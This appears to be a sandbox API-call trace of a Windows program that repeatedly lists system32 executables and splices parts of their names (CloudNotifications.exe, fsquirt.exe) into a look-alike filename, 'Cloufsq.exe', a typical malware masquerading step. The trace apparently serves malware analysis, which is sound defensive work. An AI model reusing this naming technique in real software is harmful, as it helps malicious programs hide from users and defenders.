	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.018] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] StrRChrW (lpStart="regini.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.019] FindNextFileW (in: hFindFile=0x4cdb08, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.019] FindClose (in: hFindFile=0x4cdb08 | out: hFindFile=0x4cdb08) returned 1
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.019] GetLastError () returned 0x0
	[0071.020] GetLastError () returned 0x0
	[0071.020] GetSystemDirectoryW (in: lpBuffer=0x4d3020, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0071.020] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0071.020] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 0x4cda88
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] StrRChrW (lpStart="CloudNotifications.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.020] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.021] FindNextFileW (in: hFindFile=0x4cda88, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.022] StrRChrW (lpStart="fsquirt.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetLastError () returned 0x0
	[0071.022] GetSystemDirectoryW (in: lpBuffer=0x4d3020, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0071.022] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0071.022] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 0x4cdc48
	[0071.023] StrRChrW (lpStart="gpscript.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.023] StrRChrW (lpStart="sdchange.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.023] GetLastError () returned 0x0
	[0071.023] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetLastError () returned 0x0
	[0071.024] GetSystemDirectoryW (in: lpBuffer=0x4d3020, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0071.024] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0071.024] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 0x4cd748
	[0071.024] StrRChrW (lpStart="BackgroundTransferHost.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.024] StrRChrW (lpStart="cliconfg.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] lstrcatW (in: lpString1="Cloufsq", lpString2=".exe" | out: lpString1="Cloufsq.exe") returned="Cloufsq.exe"
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetLastError () returned 0x0
	[0071.025] GetSystemDirectoryW (in: lpBuffer=0x4d3020, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0071.025] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0071.025] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 0x4cd7c8
	[0071.026] StrRChrW (lpStart="control.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.026] StrRChrW (lpStart="RmClient.exe", lpEnd=0x0, wMatch=0x2e) returned=".exe"
	[0071.026] FindNextFileW (in: hFindFile=0x4cd7c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.026] FindClose (in: hFindFile=0x4cd7c8 | out: hFindFile=0x4cd7c8) returned 1
	[0071.026] GetTickCount () returned 0x2579c
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetLastError () returned 0x0
	[0071.027] GetSystemDirectoryW (in: lpBuffer=0x4d3020, uSize=0xfd | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0071.027] lstrcatW (in: lpString1="C:\\Windows\\system32", lpString2="\\*.exe" | out: lpString1="C:\\Windows\\system32\\*.exe") returned="C:\\Windows\\system32\\*.exe"
	[0071.027] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\*.exe", lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 0x4cd5c8
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.027] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.028] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
	[0071.050] FindNextFileW (in: hFindFile=0x4cd5c8, lpFindFileData=0x4d2dc8 | out: lpFindFileData=0x4d2dc8) returned 1
